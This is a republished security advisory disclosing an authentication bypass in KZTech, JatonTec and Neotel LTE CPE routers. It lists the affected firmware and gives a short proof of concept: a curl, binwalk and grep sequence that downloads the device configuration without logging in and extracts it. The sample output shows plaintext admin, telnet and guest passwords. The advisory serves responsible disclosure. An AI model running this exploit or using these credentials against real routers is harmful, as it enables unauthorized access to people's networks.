KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authentication Bypass ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 20th, 2021 📆 | 7490 Views ⚑

0

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authentication Bypass ≈ Packet Storm

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Authentication Bypass

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/

Affected version: Model | Firmware
——-|———
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4×4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The application suffers from an authentication bypass
vulnerability. An unauthenticated attacker can disclose sensitive
and clear-text information resulting in authentication bypass by
downloading the configuration of the device and revealing the
admin password.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2021-5636
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php

03.02.2021

$ curl -s
-o configtest.zlib # Default: config.dat
‘http://192.168.1.1:8080/cgi-bin/export_settings.cgi’ ;
binwalk -e configtest.zlib ;
cd _configtest.zlib_extracted ;
strings * | grep -ni ‘Login|Password|Telnet|Guest’ ;
# cat /tmp/nvramconfig/RT28060_CONFIG_VLAN # On device
cd ..

3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

Source link

Tagged with:



Leave a Reply